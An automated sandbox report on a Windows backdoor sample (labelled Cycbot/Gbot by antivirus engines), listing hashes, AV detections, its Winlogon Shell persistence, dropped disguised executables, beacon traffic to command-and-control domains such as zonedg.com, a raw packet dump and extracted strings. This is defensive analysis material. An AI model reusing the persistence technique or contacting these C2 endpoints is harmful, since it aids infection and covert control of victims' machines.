Analysis Date | 2014-11-20 15:43:04 |
---|---|
MD5 | 8140dd3febfec1c819e28f6aa65e0455 |
SHA1 | 887562704cd3c7988be8e86ebeb4b5534b6ce8e7 |
Static Details:
File type | PE32 executable for MS Windows (GUI) Intel 80386 32-bit | |
---|---|---|
Section | .text md5: 8a2745d53daf5d2b7bad8c609b1c5702 sha1: dfd65c2fe5bced2c7c2213aa6d3626d85576d713 size: 114688 | |
Section | .tls md5: 0778bee6f0e10a72d16ee5a105c77f11 sha1: 94b78cb4c2bf806848e01465c0d52cef35546ed5 size: 1024 | |
Section | .data md5: 220e19c69d22b5ebb585f3a2e82e61b5 sha1: 55acd5c294dc3fb61d7584d1593d68066df7dc0e size: 67072 | |
Section | .reloc md5: a6272144641beacb67877be8b8a56489 sha1: 54796189c425f728012011c6f8fe8fbff6bd857e size: 1024 | |
Timestamp | 2005-11-29 07:48:07 | |
PEhash | 4752779d3fc50723abe0046462552b4130c79d68 | |
IMPhash | 00eb14c30da1e3b4a24f2c4f39ffc693 | |
AV | 360 Safe | Gen:Heur.Conjar.5 |
AV | Ad-Aware | Gen:Heur.Conjar.5 |
AV | Alwil (avast) | Cybota [Trj] |
AV | Arcabit (arcavir) | no_virus |
AV | Authentium | W32/Goolbot.K.gen!Eldorado |
AV | Avira (antivir) | TR/Crypt.XPACK.Gen8 |
AV | BullGuard | Gen:Heur.Conjar.5 |
AV | CA (E-Trust Ino) | Win32/FakeAlert.J!generic |
AV | CAT (quickheal) | Backdoor.Cycbot.B |
AV | ClamAV | Trojan.Gbot-453 |
AV | Dr. Web | BackDoor.Gbot.70 - infected, incurable |
AV | Emsisoft | Gen:Heur.Conjar.5 |
AV | Eset (nod32) | Win32/Kryptik.SRP |
AV | Fortinet | W32/Kryptik.SMY!tr.bdr |
AV | Frisk (f-prot) | W32/Goolbot.K.gen!Eldorado |
AV | F-Secure | Gen:Heur.Conjar.5 |
AV | Grisoft (avg) | Win32/Cryptor |
AV | Ikarus | Backdoor.Win32.Cycbot |
AV | K7 | Backdoor ( 003210941 ) |
AV | Kaspersky | Backdoor.Win32.Gbot.odl |
AV | MalwareBytes | Backdoor.Bot |
AV | Mcafee | BackDoor-EXI.gen.n |
AV | Microsoft Security Essentials | Backdoor:Win32/Cycbot.G |
AV | MicroWorld (escan) | Gen:Heur.Conjar.5 |
AV | Norman | Gen:Heur.Conjar.5 |
AV | Rising | Backdoor.Win32.Cycbot.a |
AV | Sophos | Mal/FakeAV-IS |
AV | Symantec | Backdoor.Cycbot!gen7 |
AV | Trend Micro | BKDR_CYCBOT.SME3 |
AV | VirusBlokAda (vba32) | BScope.DeadCryptor.01597 |
Runtime Details:
Screenshot | ![]() |
---|
Process
↳ C:\malware.exe
Registry | HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1 |
---|---|
Registry | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe |
Creates File | C:\Documents and Settings\Administrator\Application Data\dwm.exe |
Creates File | C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat |
Creates File | C:\Documents and Settings\Administrator\Cookies\index.dat |
Creates File | PIPE\lsarpc |
Creates File | \Device\Afd\Endpoint |
Creates File | C:\Documents and Settings\Administrator\Application Data\75DE.FFC |
Creates File | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat |
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft |
Creates Process | C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp |
Creates Mutex | {45BCA615-C82A-4152-8857-BCC626AE4C8D} |
Creates Mutex | {5A92A751-F926-4BB9-872E-BEC4A4CD571F} |
Creates Mutex | WininetConnectionMutex |
Creates Mutex | c:!documents and settings!administrator!cookies! |
Creates Mutex | {61B98B86-5F44-42b3-BCA1-33904B067B81} |
Creates Mutex | {0ECE180F-6E9E-4FA6-A154-6876D9DB8906} |
Creates Mutex | c:!documents and settings!administrator!local settings!history!history.ie5! |
Creates Mutex | {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78} |
Creates Mutex | {B37C48AF-B05C-4520-8B38-2FE181D5DC78} |
Creates Mutex | c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! |
Creates Mutex | {35BCA615-C82A-4152-8857-BCC626AE4C8D} |
Winsock DNS | 127.0.0.1 |
Winsock DNS | yourvideoportal.com |
Winsock DNS | onlinemediaresource.com |
Winsock DNS | psfk.com |
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process | C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe |
---|
Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process | C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe |
---|
Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Network Details:
DNS | psfk.com Type: A 72.10.50.52 |
---|---|
DNS | onlinemediaresource.com Type: A 54.208.78.194 |
DNS | zonedg.com Type: A 141.8.225.80 |
DNS | zonedg.com Type: A 141.8.225.80 |
DNS | yourvideoportal.com Type: A 54.209.168.250 |
HTTP GET | http://psfk.com/img/icons/twitter.png?v16=12&tq=gJ4WK%2FSUh%2FTNhRMw9YLJ%2BMSTUivqg4b0zZpEfqHXarVJ%2BQhhAAQ%3D User-Agent: mozilla/2.0 |
HTTP GET | http://onlinemediaresource.com/blog/images/3521.jpg?v55=6&tq=gKZEtzyMv5rJqxG1J42pzMffBvUr0%2BjbwvgS917V65rJqlLfgPiWW1cg User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNwlKv975Xlm5G User-Agent: mozilla/2.0 |
HTTP GET | http://yourvideoportal.com/blog/images/3521.jpg?v13=64&tq=gKZEtzyMv5rJqxG1J42pzMffBvUr0%2BjbwvgS917X65rJqlLfgPiWW1cg User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNxlKv975Xlm5G User-Agent: mozilla/2.0 |
HTTP POST | http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1lX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJtX%2BSNxr5ygm1C4lKv975Xlm5G User-Agent: mozilla/2.0 |
Flows TCP | 192.168.1.1:1031 ➝ 72.10.50.52:80 |
Flows TCP | 192.168.1.1:1032 ➝ 54.208.78.194:80 |
Flows TCP | 192.168.1.1:1034 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1035 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1036 ➝ 54.209.168.250:80 |
Flows TCP | 192.168.1.1:1037 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1038 ➝ 141.8.225.80:80 |
Flows TCP | 192.168.1.1:1039 ➝ 141.8.225.80:80 |
Raw Pcap
0x00000000 (00000) 47455420 2f696d67 2f69636f 6e732f74 GET /img/icons/t 0x00000010 (00016) 77697474 65722e70 6e673f76 31363d31 witter.png?v16=1 0x00000020 (00032) 32267471 3d674a34 574b2532 46535568 2&tq=gJ4WK%2FSUh 0x00000030 (00048) 25324654 4e68524d 7739594c 4a253242 %2FTNhRMw9YLJ%2B 0x00000040 (00064) 4d535455 69767167 3462307a 5a704566 MSTUivqg4b0zZpEf 0x00000050 (00080) 71485861 72564a25 32425168 68414151 qHXarVJ%2BQhhAAQ 0x00000060 (00096) 25334420 48545450 2f312e30 0d0a436f %3D HTTP/1.0..Co 0x00000070 (00112) 6e6e6563 74696f6e 3a20636c 6f73650d nnection: close. 0x00000080 (00128) 0a486f73 743a2070 73666b2e 636f6d0d .Host: psfk.com. 0x00000090 (00144) 0a416363 6570743a 202a2f2a 0d0a5573 .Accept: */*..Us 0x000000a0 (00160) 65722d41 67656e74 3a206d6f 7a696c6c er-Agent: mozill 0x000000b0 (00176) 612f322e 300d0a0d 0a a/2.0.... 0x00000000 (00000) 47455420 2f626c6f 672f696d 61676573 GET /blog/images 0x00000010 (00016) 2f333532 312e6a70 673f7635 353d3626 /3521.jpg?v55=6& 0x00000020 (00032) 74713d67 4b5a4574 7a794d76 35724a71 tq=gKZEtzyMv5rJq 0x00000030 (00048) 7847314a 3432707a 4d666642 76557230 xG1J42pzMffBvUr0 0x00000040 (00064) 2532426a 62777667 53393137 56363572 %2BjbwvgS917V65r 0x00000050 (00080) 4a716c4c 66675069 57573163 67204854 JqlLfgPiWW1cg HT 0x00000060 (00096) 54502f31 2e300d0a 436f6e6e 65637469 TP/1.0..Connecti 0x00000070 (00112) 6f6e3a20 636c6f73 650d0a48 6f73743a on: close..Host: 0x00000080 (00128) 206f6e6c 696e656d 65646961 7265736f onlinemediareso 0x00000090 (00144) 75726365 2e636f6d 0d0a4163 63657074 urce.com..Accept 0x000000a0 (00160) 3a202a2f 2a0d0a55 7365722d 4167656e : */*..User-Agen 0x000000b0 (00176) 743a206d 6f7a696c 6c612f32 2e300d0a t: mozilla/2.0.. 0x000000c0 (00192) 0d0a .. 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683838 42537225 32466525 OhLgjh88BSr%2Fe% 0x000000c0 (00192) 32425635 5a755267 25334425 33442048 2BV5ZuRg%3D%3D H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a207a TTP/1.1..Host: z 0x000000e0 (00224) 6f6e6564 672e636f 6d0d0a55 7365722d onedg.com..User- 0x000000f0 (00240) 4167656e 743a206d 6f7a696c 6c612f32 Agent: mozilla/2 0x00000100 (00256) 2e300d0a 436f6e74 656e742d 4c656e67 .0..Content-Leng 0x00000110 (00272) 74683a20 300d0a43 6f6e6e65 6374696f th: 0..Connectio 0x00000120 (00288) 6e3a2063 6c6f7365 0d0a0d0a n: close.... 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683873 47253242 636f4a73 OhLgjh8sG%2BcoJs 0x000000c0 (00192) 58253242 534e776c 4b763937 35586c6d X%2BSNwlKv975Xlm 0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos 0x000000e0 (00224) 743a207a 6f6e6564 672e636f 6d0d0a55 t: zonedg.com..U 0x000000f0 (00240) 7365722d 4167656e 743a206d 6f7a696c ser-Agent: mozil 0x00000100 (00256) 6c612f32 2e300d0a 436f6e74 656e742d la/2.0..Content- 0x00000110 (00272) 4c656e67 74683a20 300d0a43 6f6e6e65 Length: 0..Conne 0x00000120 (00288) 6374696f 6e3a2063 6c6f7365 0d0a0d0a ction: close.... 0x00000130 (00304) 2020203c 703e4e6f 20737563 68206669 <p>No such fi 0x00000140 (00320) 6c65206f 72206469 72656374 6f72792e le or directory. 0x00000150 (00336) 3c2f703e 0a20203c 6872202f 3e0a2020 </p>. <hr />. 0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso 0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr 0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>. </body>.< 0x00000190 (00400) 2f68746d 6c3e0a /html>. 0x00000000 (00000) 47455420 2f626c6f 672f696d 61676573 GET /blog/images 0x00000010 (00016) 2f333532 312e6a70 673f7631 333d3634 /3521.jpg?v13=64 0x00000020 (00032) 2674713d 674b5a45 747a794d 7635724a &tq=gKZEtzyMv5rJ 0x00000030 (00048) 71784731 4a343270 7a4d6666 42765572 qxG1J42pzMffBvUr 0x00000040 (00064) 30253242 6a627776 67533931 37583635 0%2BjbwvgS917X65 0x00000050 (00080) 724a716c 4c666750 69575731 63672048 rJqlLfgPiWW1cg H 0x00000060 (00096) 5454502f 312e300d 0a436f6e 6e656374 TTP/1.0..Connect 0x00000070 (00112) 696f6e3a 20636c6f 73650d0a 486f7374 ion: close..Host 0x00000080 (00128) 3a20796f 75727669 64656f70 6f727461 : yourvideoporta 0x00000090 (00144) 6c2e636f 6d0d0a41 63636570 743a202a l.com..Accept: * 0x000000a0 (00160) 2f2a0d0a 55736572 2d416765 6e743a20 /*..User-Agent: 0x000000b0 (00176) 6d6f7a69 6c6c612f 322e300d 0a0d0a20 mozilla/2.0.... 0x000000c0 (00192) 2020203c 2f746974 6c653e0a 20203c2f </title>. </ 0x000000d0 (00208) 68656164 3e0a2020 3c626f64 793e0a20 head>. <body>. 0x000000e0 (00224) 2020203c 68333e54 68697320 69732074 <h3>This is t 0x000000f0 (00240) 68652072 65616c2d 6d6f6465 20746573 he real-mode tes 0x00000100 (00256) 74207061 67652e2e 2e3c2f68 333e0a09 t page...</h3>.. 0x00000110 (00272) 093c696d 67207372 633d226c 6f676f2e .<img src="logo. 0x00000120 (00288) 67696622 3e0a2020 3c2f626f 64793e0a gif">. </body>. 0x00000130 (00304) 3c2f6874 6d6c3e0a </html>. 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683838 42537225 32466525 OhLgjh88BSr%2Fe% 0x000000c0 (00192) 32425635 5a755267 25334425 33442048 2BV5ZuRg%3D%3D H 0x000000d0 (00208) 5454502f 312e310d 0a486f73 743a207a TTP/1.1..Host: z 0x000000e0 (00224) 6f6e6564 672e636f 6d0d0a55 7365722d onedg.com..User- 0x000000f0 (00240) 4167656e 743a206d 6f7a696c 6c612f32 Agent: mozilla/2 0x00000100 (00256) 2e300d0a 436f6e74 656e742d 4c656e67 .0..Content-Leng 0x00000110 (00272) 74683a20 300d0a43 6f6e6e65 6374696f th: 0..Connectio 0x00000120 (00288) 6e3a2063 6c6f7365 0d0a0d0a 64793e0a n: close....dy>. 0x00000130 (00304) 3c2f6874 6d6c3e0a </html>. 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a683873 47253242 636f4a75 OhLgjh8sG%2BcoJu 0x000000c0 (00192) 58253242 534e786c 4b763937 35586c6d X%2BSNxlKv975Xlm 0x000000d0 (00208) 35472048 5454502f 312e310d 0a486f73 5G HTTP/1.1..Hos 0x000000e0 (00224) 743a207a 6f6e6564 672e636f 6d0d0a55 t: zonedg.com..U 0x000000f0 (00240) 7365722d 4167656e 743a206d 6f7a696c ser-Agent: mozil 0x00000100 (00256) 6c612f32 2e300d0a 436f6e74 656e742d la/2.0..Content- 0x00000110 (00272) 4c656e67 74683a20 300d0a43 6f6e6e65 Length: 0..Conne 0x00000120 (00288) 6374696f 6e3a2063 6c6f7365 0d0a0d0a ction: close.... 0x00000130 (00304) 2020203c 703e4e6f 20737563 68206669 <p>No such fi 0x00000140 (00320) 6c65206f 72206469 72656374 6f72792e le or directory. 0x00000150 (00336) 3c2f703e 0a20203c 6872202f 3e0a2020 </p>. <hr />. 0x00000160 (00352) 3c616464 72657373 3e4d6963 726f736f <address>Microso 0x00000170 (00368) 66742d49 49532f37 2e303c2f 61646472 ft-IIS/7.0</addr 0x00000180 (00384) 6573733e 0a20203c 2f626f64 793e0a3c ess>. </body>.< 0x00000190 (00400) 2f68746d 6c3e0a /html>. 0x00000000 (00000) 504f5354 202f696e 6465782e 68746d6c POST /index.html 0x00000010 (00016) 3f74713d 674b5930 73486f4c 374c2532 ?tq=gKY0sHoL7L%2 0x00000020 (00032) 424e3679 4c68627a 36323773 48644d66 BN6yLhbz627sHdMf 0x00000030 (00048) 316c5825 32425039 68253242 49307344 1lX%2BP9h%2BI0sD 0x00000040 (00064) 6b583950 69777257 4c324755 72302532 kX9PiwrWL2GUr0%2 0x00000050 (00080) 42624770 66765273 58253242 61497762 BbGpfvRsX%2BaIwb 0x00000060 (00096) 35316757 31663434 37477258 66306555 51gW1f447GrXf0eU 0x00000070 (00112) 32532532 4273536f 644f4675 544c6976 2S%2BsSodOFuTLiv 0x00000080 (00128) 30616744 68327850 36504c45 71776143 0agDh2xP6PLEqwaC 0x00000090 (00144) 476b726c 25324637 4c644250 4e705070 Gkrl%2F7LdBPNpPp 0x000000a0 (00160) 54757871 30307344 304f704c 6a527141 Tuxq00sD0OpLjRqA 0x000000b0 (00176) 4f684c67 6a682532 46383225 3242636f OhLgjh%2F82%2Bco 0x000000c0 (00192) 4a745825 3242534e 78723579 676d3143 JtX%2BSNxr5ygm1C 0x000000d0 (00208) 346c4b76 39373558 6c6d3547 20485454 4lKv975Xlm5G HTT 0x000000e0 (00224) 502f312e 310d0a48 6f73743a 207a6f6e P/1.1..Host: zon 0x000000f0 (00240) 6564672e 636f6d0d 0a557365 722d4167 edg.com..User-Ag 0x00000100 (00256) 656e743a 206d6f7a 696c6c61 2f322e30 ent: mozilla/2.0 0x00000110 (00272) 0d0a436f 6e74656e 742d4c65 6e677468 ..Content-Length 0x00000120 (00288) 3a20300d 0a436f6e 6e656374 696f6e3a : 0..Connection: 0x00000130 (00304) 20636c6f 73650d0a 0d0a close....
Strings
. . . 080904b0 1.0.0.1 1117 FileVersion &find &Find any Alt+F PrivateBuild ProductVersion StringFileInfo Translation VarFileInfo VS_VERSION_INFO ``````````````` `^*``$ ^^^^^^^ ^^^^^^^^^^^^_______ ~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~ ,,,,,,,,,,,,,,,,,,,,,,,, ;;;;;;;;;;;;;;;; :::::: :::::::: ::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::::: !!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!! ????????????????????? ????????????????????????????????????????????? //////////////////////////////////////////////// '''''''''' """"""""""""""""""""""""""""""""""""" [[[[[[[[[[[[[[[[[[[ [[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[ ]'{]{^ {{{{{{{{{{{{ }}}}}}}}}}}}} }}}}}}}}}}}}}}} $$$$$$$$$ ******************** & `,`@. & & @ &&&&&& ######################## ##########################= ++++++++ 0000000000000000000000000000000000 0000jjjjjjjj &,00PG@ ",_0aP 0OvYjJ6 0T0v6D6 0YO^s\ @1%^^ 1111111111111111111 1*H2N@ 2}20R ` $@ 29^E 2DL~fE [2hHrZ0 ``2}J! 333333333333333333ddddddddddddddddddddddddddddddddddddddddddddddff 333333333344IIIIIIIIIII 3~"`@Cq *'3\`m 3_^n^x -3YlBe `[4;~>D 4GdeLZ$ 4jZI& [4lV-s_ 4pV7Kr 5,_0bg 55555555555nnnnnnnnnn 55a8)Y/ * 55yV6( 57s1)) 58o$Q[ 5j?&` R 5"@n]/ 5+rR} `` $6h+|D` 6-P4gZ @$<6[y `@7&` _^7QfI , @}8' 8$@` < ]8'5V ((((((((((((((((((((888888 888888888 @, 8C. $ [8~D $@@9], 99999999999999 9-a3I)J 9bi0z5 9D/uto 9\s m\ A2X7y, ~A87}fw +a9f]8 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ac2z`C8 ADVAPI32.dll a^fg( `A* `qF avFt{6 A!`w*8 aY]a#t ` b179 B2Q$0Z `B|9<g `BDCa" b"{ob7 ,@@B>P `#=bR bwh.dll bYBlUb bz{#N% C@'&@ "C1}{i ccccccccccccccccccccccccccccccccccccccchhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh Cf@@= !C{\Me CreateProcessA *cy3B} @.data {*@@Db ,,DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm $`@{Dk @d>=mE Dq^W5H dT&` ` DTW^'8 @>E%a~42 E'g=A; eI(!&p58s[ (@@Elr! EnumResourceNamesW ? e`Nz E|rBH' <E/u, e!v2|5G~tI~7C e'W>-; Ex%,o3 Ey/ `` ey;OR8 *f7;)[+ F{BOiq FFFFFF fffffffffffff ffffffffffffff FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF ."f/F%n/ \Fnj)*I fO4iA3w F !sb! >*@ fV @F<X<d_. g 1#rI /gdTX GetSystemTimeAsFileTime gOb~HG33 G~S>")I .G/sNw Gv5:8 GW|$ ` ^h2r,V h>^4ZMrA h|9&@ Hf2Wbh$ `@hG_O HhF;+" hhhhhhhhhhhh @hpG. @ . `h_QW h*`@TU< H']~UT `i, /i=a1a] iaxs[)x7 Ibxv6vl idJNGFx -#IHX*-0[ iiiiiiiiiiiii iiiiiiiiiiiiiiiiiii 'ij>hZ- I N94 InterlockedExchange iOZ, ` ? @i#W J3g8{t j3M\8u ^=J8=& jjj JJJJJJJJJJJJJJ JKh=P4 jO}FX+ jrs>uS J"*VtB+r+ JxGm ` jz6H*` ` K^'>= K2:dP*Rh `K7H%# ].k|99 ?Kdk2' KERNEL32.dll kfbf&ah kM9*SO kQt@_EL ~KS28; KSoN.% @ K}u@ /]l$`@" L' @`@ L0shxq ~L1=r4 \L"!24(cf`n $`@lbZ Limgs_r lKI"`@]F llllllllllllllleeeeeeee LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL llllllllllloooooooo %.L<nPl_ LocalAlloc lstrlenA |L!T^%@ lX3 \!n M1o;Ih M4K'<Q5< M:fCms [Mf*sE m$H-`W m ``jh? mmmmmmmmmmmfffffffffffffffffffffffffffffffffffffffffffu mmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmm MP[\iH' MPRAPI.dll MprConfigGetFriendlyName MprConfigServerConnect MprConfigServerDisconnect msi9ke#:OM4} i MultiByteToWideChar /M=v5q (@@mwa2 'mY;oA MyRZbr N:&`@& NdrFixedArrayFree n$@`Ft+ nnnnnnnnnnn n-/PvWr nSP01, N.zAQy O57>%0 o_Cyi1 +Od@l-r7B -o:l}p o&` m] @@/o+O oooooooooooooooooooooooo OpenWaitableTimerW `oT`B o%UQSfs `?ov,-8 ,@ P%/ PathFileExistsW @@;p`D P+F+3PP pidTJq PPPPPPPPP PPPPPPPPPPPPPPPPP PPPPPPPPPPPPPPPPPPPPPPPPPPPP PzT'* q^CQo2> qfsRfS Q[h}L ``#Q l `@Q~nH `@QOYn {q[q?= QQ5Qkj qqqqqqqqqq qQuBsD q R:a} Q[XTn. r4['^0{ (R:6GrS< r8= ` G RaiseException rB*@@" RegCloseKey RegCreateKeyExA RegDeleteKeyA RegEnumKeyExA RegOpenKeyA RegOpenKeyExA RegQueryValueExA RegSetValueExA .reloc R*&FbvS R%$*k[4 {R^:k6j RPCRT4.dll Rqdf'r rrrrrr``````` RRRRRRRRR RRRRRRRRRRRRRRRRlllllllllllllllllllllllllllllllllllllll @RS `B &r%SR1 RS#W{" s+ @#/ /sb, @ s~`BMov sC'"@ `SdC*@`j SHLWAPI.dll S I9K9U @`sJHMg sJobx7 +sMtY4g [spSR SSSSSSS sssssssssssCCCCCCC SSSSSSSSSSSSSSSSSSS t2X^n- T3} 1W Tb]></ !This program cannot be run in DOS mode. tI@KFe ` =Tj-G *to2iP/~Ij tttttt TTTTTTTTTTTTTTTTT55 TTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTT TTTTTTTTTTTTTTTTTTTTTTTTTTTT tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt |.@@U u!]+8X4 uAVZ{15x Ub\Y2\ "@ UD9 ;uH/3/ uj()5QE \U%'nv UuidCreate %uzAQ_ V`9FcT( VA")GX ?v" @hL VirtualAllocEx ~VJdhZ+Ib VjUC/h" `@vJZQ :?\`/Vm vN;DSqCy :Vqqr~ Vr8t;N ]]]]]]]]]]]]]VVVVVVVVVVV @>VxS0 ; `@W$@ W|8P[q W9'D'3 %WbZQH ~&wH#@ WideCharToMultiByte wj}BwA `wLAu(BT) )/WmQ"` WM|Uay WTE(@` wvKiXc? WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW X; !,) X+0jk7G 